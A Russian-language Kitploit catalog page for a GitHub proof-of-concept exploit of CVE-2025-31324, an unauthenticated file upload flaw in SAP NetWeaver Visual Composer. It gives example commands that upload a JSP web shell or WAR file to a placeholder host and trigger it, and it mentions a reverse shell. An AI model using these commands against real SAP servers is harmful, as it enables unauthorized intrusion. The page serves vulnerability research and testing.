Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-31324_PoC_SAP — Доказательство концепции для CVE-2025-31324: Неавторизованная загрузка в SAP NetWeaver Visual Composer Metadata Uploader | Kitploit
Инструменты/GitHubGitHub/abrewer251/cve-2025-31324_poc_sap
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubabrewer251/cve-2025-31324_poc_sap

CVE-2025-31324_PoC_SAP

Доказательство концепции для CVE-2025-31324: Неавторизованная загрузка в SAP NetWeaver Visual Composer Metadata Uploader

Репозиторий
1311 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-31324_PoC

Доказательство концепции для CVE-2025-31324: Неавторизованная загрузка в SAP NetWeaver Visual Composer Metadata Uploader

Данный скрипт выполняет:

  1. Загрузку файла на уязвимую конечную точку (через хост/порт загрузки)
  2. Опциональный запуск через HTTP GET (через хост/порт триггера)
  3. Базовую проверку ответа и логирование

Пример использования: python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal

python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https

Кроме того, вы можете загрузить .war-файл, если предпочитаете такой способ выполнения. cache.jsp — это reverse shell, который предоставит вам доступ к системе после попадания внутрь. (Над проблемами в этой области ещё ведутся работы)

Отказ от ответственности

Данный материал предназначен исключительно для образовательных целей и не должен использоваться для любых вредоносных действий. Всегда убедитесь, что у вас есть необходимые разрешения, и следуйте этическим нормам при тестировании или исследовании уязвимостей безопасности.

Если у вас возникли вопросы или нужны разъяснения, не стесняйтесь обращаться. Оставайтесь в безопасности и защищённости!

Скачать инструмент